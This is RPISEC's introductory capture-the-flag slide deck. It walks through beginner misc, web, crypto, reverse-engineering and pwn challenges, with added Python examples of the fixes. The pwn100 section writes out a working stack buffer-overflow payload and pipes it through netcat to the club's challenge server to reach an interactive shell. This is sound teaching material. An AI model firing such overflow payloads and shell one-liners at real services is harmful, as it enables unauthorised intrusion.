02 - Fairgame Rundown

This document provides an overview of the Fairgame capture the flag (CTF) competition run by RPISEC. Fairgame covers five subjects: pwn (binary exploitation), re (reverse engineering), crypto (cryptography), web (web applications), and misc (puzzles, steganography, etc.). It describes some introductory challenges for each subject area, including tools needed and solutions. The challenges increase in difficulty and cover various techniques like identifying cipher types, debugging binaries, finding hidden files, and exploiting vulnerabilities. The document aims to introduce participants to the range of skills tested in CTF competitions.


RPISEC

Fairgame Rundown
Fall 2022

RPISEC - 09/30/2022 RPISEC 1


Fairgame
• Fairgame is an introductory CTF
• Runs until winter break
• Covers five subjects:
– pwn - binary exploitation
– re - reverse engineering
– crypto - cryptography
– web - web applications
– misc - puzzles, steganography, party tricks, etc.



Tooling
• VM installation was covered at INTROSEC
• Includes a variety of useful tools
• Get it here: http://tools.rpis.ec/
• We’ll also assume you have some basic experience with the Linux command line
– All important commands are shown, though!



Conventions
$ commands are shown like this



misc
• misc chals cover a variety of topics
• Finding the right angle is key



misc100?
• Our misc100 is somewhere on Slack this year (:
• ...so we’ll look at misc200 instead
• (it’s definitely not just the normal misc100)



misc200 - “Flag? What Flag?”
• Download misc100.tar.gz
• This is a gzipped tarball
– gzip compresses files
– tar puts files into a single archive - a “tarball”
• Basically the .zip of Linux



misc200 - “Flag? What flag?”
• We’re told it’s an ext2 disk image
• ext2 is a predecessor of ext4
• We can mount the image to browse its contents like a flash drive



misc200 - “Flag? What Flag?”
• Extract it with:
tar -xf misc100.tar.gz
• -x to extract
• -f to specify the file



misc200 - “Flag? What Flag?”



misc200 - “Flag? What flag?”
• One file comes out, misc100.img
• .img files are usually disk images
– Basically a snapshot of a storage device
• We can find out what kind of image it is with:
file misc100.img
• The file command tries to identify a file



misc200 - “Flag? What flag?”
• First, make a directory to mount to:
mkdir mnt



misc200 - “Flag? What flag?”
• Then, mount the image:
sudo mount -o loop misc100.img mnt
• mount requires root powers, hence the sudo
• Root password on the Tools VM is rpisec
• Now you can browse the files within:
cd mnt



misc200 - “Flag? What flag?”
• Let’s look around a bit
ls
• You’ll see the following files:
bin dev etc lib linuxrc lost+found proc sbin tmp usr var
• So this is a disk image of some Linux system



misc200 - “Flag? What flag?”
• ...but where’s the flag?
• Let’s take a closer look!
ls -la
• -l to show files in a list
• -a to show all files



misc200 - “Flag? What flag?”
• There’s a file called .flag in there!
– Files with a . in front are hidden by default
• So, what is it?
file .flag
• It’s gzip compressed data
• We can extract it with...gzip, of course
• The mounted image is read-only, though, so we’ll move the file first.
misc200 - “Flag? What flag?”
cp .flag /tmp/flag.gz
cd /tmp
gunzip flag.gz
• Now we have a file called flag
file flag
• It’s a .tar again!
tar -xf flag
misc200 - “Flag? What flag?”
• The .tar contained a file called flag, so it overwrote itself
• Now we can just…
cat flag



misc200 - “Flag? What flag?”
• This sort of challenge becomes very easy once you’re used to the terminal
• Always try to figure out what it is you’re looking at!
– file
– binwalk
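The unwrapping loop above (identify the file, peel one layer, identify again) is what `file` plus `gunzip`/`tar` did by hand. As an added example that is not part of the slides or the challenge files, the Python 3 script below does the same thing in memory: it identifies gzip and tar layers by their magic bytes, the way `file` does, rather than trusting the file name, and keeps peeling until it reaches something that is neither. The sample archive it builds is constructed here (a file named `flag` inside a tar inside gzip) and is not the real challenge image; the nesting order is an assumption.

```python
import gzip
import io
import tarfile

GZIP_MAGIC = b"\x1f\x8b"          # first two bytes of every gzip stream
TAR_MAGIC_OFFSET = 257            # "ustar" sits here in a POSIX/GNU tar header


def identify(data: bytes) -> str:
    """Tiny stand-in for the `file` command: look at magic bytes, not the name."""
    if data.startswith(GZIP_MAGIC):
        return "gzip"
    if len(data) > TAR_MAGIC_OFFSET + 5 and data[TAR_MAGIC_OFFSET:TAR_MAGIC_OFFSET + 5] == b"ustar":
        return "tar"
    if data.startswith(b"\x7fELF"):
        return "elf"
    return "data"


def unwrap(data: bytes, max_layers: int = 10):
    """Peel gzip/tar layers until something else appears.

    Returns (layers_seen, innermost_bytes). For a tar layer the first regular
    file member is taken, which mirrors the single-file tarballs on the slides.
    max_layers guards against a deliberately endless "archive inside archive"."""
    layers = []
    for _ in range(max_layers):
        kind = identify(data)
        if kind == "gzip":
            layers.append("gzip")
            data = gzip.decompress(data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
                member = next(m for m in tf.getmembers() if m.isfile())
                layers.append(f"tar:{member.name}")
                data = tf.extractfile(member).read()
        else:
            return layers, data
    raise ValueError("too many nested layers")


def build_sample() -> bytes:
    """Constructed input (not the challenge file): `flag` inside a tar, gzipped."""
    payload = b"flag{constructed_sample_not_the_real_flag}\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo(name="flag")
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return gzip.compress(buf.getvalue())


if __name__ == "__main__":
    layers, inner = unwrap(build_sample())
    print("layers:", layers)
    print("inner :", inner.decode())
```

Note that `identify()` reports the gzip layer first even though a tar is inside, exactly like `file .flag` on the slide said "gzip compressed data" and only after `gunzip` did `file flag` reveal the tar.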



web
• web challenges deal with...web stuff
– Pretty much anything with a browser
• Split into two big categories:
– Client-side: attacking the browser
– Server-side: attacking the server



web100 - “Client Page”
• web100 presents us with a login screen
• First, we should examine the page!
• In Firefox, hit ctrl+u to view the page’s source



web100 - “Client Page”
• auth.js sounds interesting!
• Click on it to view the file



web100 - “Client Page”
• Oh no! Client-side authentication!
– The login is checked in your browser…
– ...and not on the server
• users sounds pretty interesting...



web100 - “Client Page”
• Open the dev console with F12 or ctrl-shift-I
• Now we can look at users by typing…
users
• It’s an array of two things, so view the first one:
users[0]
• Looks like a username and password to me!
• Log in and get the flag
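To make the web100 lesson concrete from the defender's side, here is an added Python 3 example (not code from the slides or from the challenge) that contrasts the two designs. `client_side_page()` reproduces the anti-pattern: because the check runs in the browser, the credential list has to be shipped inside the page, so anyone who views source can read it. `server_side_login()` is the shape the fix takes: the server keeps only a salt and a PBKDF2 hash, the comparison happens server-side, and the client only ever learns true or false. The demo username and password are constructed values, not the challenge's.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Constructed demo credential for this example only.
DEMO_USER = "demo"
DEMO_PASSWORD = "correct horse"

PBKDF2_ROUNDS = 100_000  # assumption: a reasonable cost for a demo


def client_side_page(users: List[Tuple[str, str]]) -> str:
    """The web100 anti-pattern: the login is checked in the browser, so the
    page (here standing in for auth.js) must carry every username and password."""
    rows = ", ".join(f'["{u}", "{p}"]' for u, p in users)
    return f"<script>var users = [{rows}];</script>"


def server_side_page() -> str:
    """Hardened page: just a form; nothing secret is sent to the client."""
    return '<form method="POST" action="/login"><input name="u"><input name="p" type="password"></form>'


def make_record(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Server-side storage: keep salt + PBKDF2-SHA256 hash, never the password."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def server_side_login(store: Dict[str, Tuple[bytes, bytes]], username: str, password: str) -> bool:
    """The check runs on the server. compare_digest avoids a timing side channel
    on the hash comparison; an unknown user simply fails."""
    record = store.get(username)
    if record is None:
        return False
    salt, expected = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    print(client_side_page([(DEMO_USER, DEMO_PASSWORD)]))   # password visible in source
    store = {DEMO_USER: make_record(DEMO_PASSWORD)}
    print(server_side_page())                               # nothing to find with ctrl+u
    print(server_side_login(store, DEMO_USER, DEMO_PASSWORD))
```

The point of the contrast is where the secret lives: in the first version the browser holds the credentials, so "view source" is the whole attack; in the second the browser holds nothing worth reading.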
web100 - “Client Page”
• That was easy.
• The rest are harder!
• Web challenges cover a lot of territory:
– SQL injection to abuse badly written database queries
– XSS (cross-site scripting) to make other users run code
– Uploading malicious files and viewing those we shouldn’t



crypto
• crypto challenges fall into two camps:
– Classic ciphers, which are extremely weak
∘ Caesar ciphers
∘ Vigenere ciphers
– Modern ciphers, but with a deliberate mistake
∘ RSA
∘ DES



crypto100 - “Classic”
• This one is a classical cipher
– The title is a pretty big hint
– The cipher clearly didn’t hide the flag

vbqw{0bt1u_rkj_d0j_i0_we0t1u}
• So, we just need to identify the cipher



crypto100 - “Classic”
• Tools exist online for all of these
• Two of my suggestions:
– https://gchq.github.io/CyberChef/
– https://cryptii.com/



crypto100 - “Classic”
• It was a Caesar cipher.
– A=K
– Shift of 10



crypto100 - “Classic”
• Classical ciphers can be broken easily:
– Guessing all the keys (Caesar)
– Exploiting language patterns (Vigenere)
∘ E shows up way more than Z
• Attacking modern ciphers like this does not work:
– Huge keys, expensive operations
– The universe dies before you find the flag
• Crypto challenges will always have a trick
– Implementation errors, bad parameters, etc.



re and pwn
• re and pwn are two sides of the same coin
– re: figure out how a system works
– pwn: figure out how a system breaks



re100 - “Milk Run”
• Reversing is an incredibly deep subject
– static analysis!
– dynamic analysis!
– decompilation!
• Fortunately, re100 is pretty simple
– The program has a secret.
– We want the secret.
– Hey, isn’t this basically web100?



re100 - “Milk Run”
• First, try running the program
./re100
• We type some gibberish, it says no



re100 - “Milk Run”
• A great place to start is strings
• Shows readable text in a file
strings re100
• That’s a lot of text...



re100 - “Milk Run”
• We don’t want to read all of that
• We can use grep to filter it down
– grep takes a string to look for

strings re100 | grep flag


• The | is a pipe
– strings writes some stuff
– grep reads that stuff
• And there’s the flag!
re100 - “Milk Run”
• re is a huge puzzle
• There are many powerful tools out there:
– IDA/Ghidra/Binary Ninja/r2 for pulling apart a program
– strings and hexdump to peek at data
– objdump to find function names
– gdb to see what happens at runtime



pwn100 - “Rewards Program”
• pwn is what our motto is all about:
– Break it
– Hack it
– Own it



pwn100 - “Rewards Program”
• First, run the program
chmod +x rewards-program
./rewards-program
• It asks for your name. Type something short.



pwn100 - “Rewards Program”
• Darn :(



pwn100 - “Rewards Program”
• What if we had a longer name?
• Let’s say our name is…
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



pwn100 - “Rewards Program”
• That’s...interesting



pwn100 - “Rewards Program”
• Our input made some weird stuff happen:
– It messed up the point counter
∘ 1094795585 is not 0
– It crashed the whole program!
∘ Segfault!
• (we accessed invalid memory)

• We just broke it



pwn100 - "Rewards Program"
• The program stores our name next to the point counter
int points = 0;
char foo[20];

• But it only has room for 20 characters


• Our name was 32 characters long



pwn100 - “Rewards Program”
• This is a buffer overflow
– The program didn’t have room for our name
• 20 bytes of A's fit correctly
• The next 4 bytes clobbered the point counter
• The rest screwed up C's bookkeeping



pwn100 - “Rewards Program”
• So, how exactly did we get 1094795585 points?
• Let’s look at that number in a different way:
– Decimal: 1094795585
– Hex: 0x41414141
• That looks familiar.
• What was A in ASCII, again?



pwn100 - “Rewards Program”
• 0x41 = ‘A’
• 0x41414141 = ‘AAAA’
• So, what if we want 322424845 points?



pwn100 - “Rewards Program”
• Just go from decimal to hex:
– Decimal: 322424845
– Hexadecimal: 0x1337D00D
• very leet, d00d
• That’s hard to type!
– 0x13 is “device control 3”
– 0x0D is a carriage return
– 0xD0 is a Unicode Ð



pwn100 - “Rewards Program”
• python is great for this.
– Specifically, python 2, because it's nicer for binary data
– This prints out AAAAAAAAAAAAAAAA - sixteen A’s

python2 -c "print 'A'*16"


• We can pipe that into the program like this:
python2 -c "print 'A'*16" | ./rewards-program



pwn100 - “Rewards Program”
• Experiment with this until you just barely corrupt the counter



pwn100 - “Rewards Program”
• We needed 21 A’s to change our points to 65
– Decimal: 65
– Hexadecimal: 0x41
• So, let’s send 20 A’s, then 1337D00D!
python2 -c "print 'A'*20 + '\x13\x37\xd0\x0d'" | ./rewards-program



pwn100 - “Rewards Program”
• Hang on, that gave us 231749395 points
– Decimal: 231749395
– Hexadecimal: 0x0dd03713
• It’s...backwards?



pwn100 - “Rewards Program”
• The program’s variables are stored on the stack.
• The stack grows downward, from the largest address.
• In pwn100, it looks something like this:
– reward points (4 bytes)
– name (20 bytes)
• name is before reward points in memory



pwn100 - “Rewards Program”
• If we make our name too long, it messes up the points counter.
• Our name is written from low to high memory, so the extra bytes spill into the counter
• The first byte that lands in the counter is its least significant byte (little-endian)
– 21 A’s gave us 65 points, remember?



pwn100 - “Rewards Program”
• 20 A’s + \x0d:
– 0x0000000D
• 20 A’s + \x0d\xd0:
– 0x0000D00D
• 20 A’s + \x0d\xd0\x37:
– 0x0037D00D
• 20 A’s + \x0d\xd0\x37\x13:
– 0x1337D00D
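The byte-by-byte table above is easy to check with a model of the frame. This added Python 3 example is not from the slides and does not run the challenge binary: it assumes the layout the slides describe (a 20-byte `char foo[20]` directly below a 4-byte `int points` that starts at 0, little-endian) and simulates what an unbounded read puts into the counter. `payload_for()` does the decimal-to-reversed-bytes step with `struct.pack`, and `simulate_points_bounded()` shows the bug disappearing once the read is bounded, as `fgets(foo, sizeof foo, stdin)` would make it.

```python
import struct

# Assumed frame layout from the slides: the name buffer sits directly below
# the int, so bytes 20..23 of the input overwrite the counter.
NAME_SIZE = 20
POINTS_SIZE = 4


def simulate_points(name: bytes) -> int:
    """Model the unbounded read. Bytes past offset 24 are ignored here; in the
    real program they hit saved registers / the return address (the segfault)."""
    region = bytearray(NAME_SIZE + POINTS_SIZE)      # counter starts at 0
    spill = name[:NAME_SIZE + POINTS_SIZE]
    region[:len(spill)] = spill
    return struct.unpack("<i", region[NAME_SIZE:])[0]  # '<i' = little-endian C int


def simulate_points_bounded(name: bytes) -> int:
    """The fix: a bounded read keeps at most 19 bytes plus a NUL in foo, so the
    counter can never be reached no matter how long the name is."""
    region = bytearray(NAME_SIZE + POINTS_SIZE)
    kept = name[:NAME_SIZE - 1]
    region[:len(kept)] = kept
    return struct.unpack("<i", region[NAME_SIZE:])[0]


def payload_for(points: int) -> bytes:
    """Name that sets the counter to exactly `points`: fill the buffer, then the
    value least-significant byte first, which is the "backwards" order seen."""
    return b"A" * NAME_SIZE + struct.pack("<i", points)


if __name__ == "__main__":
    for name in (b"A" * 21, b"A" * 36, b"A" * 20 + b"\x13\x37\xd0\x0d", payload_for(322424845)):
        pts = simulate_points(name)
        print(f"{len(name):2d} bytes -> {pts:>10d}  0x{pts:08X}")
    print("bounded read, 36 A's ->", simulate_points_bounded(b"A" * 36))
```

Running it reproduces the numbers on the slides (65 for 21 A's, 1094795585 for a long run of A's, 231749395 for the bytes sent in "natural" order, 322424845 once reversed) and 0 for the bounded version.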



pwn100 - “Rewards Program”
• So, by putting the four bytes in reverse order...
python2 -c "print 'A'*20 + '\x0d\xd0\x37\x13'" | ./rewards-program

• ...we have the right number of points!



pwn100 - “Rewards Program”
• Now we just need to do it remotely.
• Most pwn challenges work like this
– Can’t just give you the program with the flag!
– Remember re100?
• We’ll use netcat, or nc for short
nc chals.fairgame.rpis.ec 5001
• Try talking to the program again



pwn100 - “Rewards Program”
• Last step: pipe Python’s output into nc!
python2 -c "print 'A'*20 + '\x0d\xd0\x37\x13'" | nc chals.fairgame.rpis.ec 5001

• (all on one line)



pwn100 - “Rewards Program”
• It worked!
• ...wait, we can’t do anything
• The program executes a shell when you win
• We can’t type anything
– nc is getting its input from Python
– Python isn’t doing anything with keyboard input
• This sucks



pwn100 - “Rewards Program”
• Solution:
(python2 -c "print 'A'*20 + '\x0d\xd0\x37\x13'"; cat) | nc chals.fairgame.rpis.ec 5001

• This executes python2, then cat


• cat will just repeat whatever we type
– ...which gets piped into netcat!



pwn100 - “Rewards Program”
• pwn is a staple of CTFs
• Creativity and patience are a must
• Too many techniques to count!



Review
We’ve covered the basics of five CTF categories:
• misc - the potpourri category
• web - browser and web server tricks
• crypto - uncovering ciphered data
• re - figuring out how a program works
• pwn - figuring out how to break a program



Coming Soon...
● Next week: web!
● Get involved with RPISEC @ https://rpis.ec/contact
○ Slack can be found on https://rpisec.slack.com
■ Come chat with RPISEC members and alumni!
○ Mailing list invite can be found on contact page
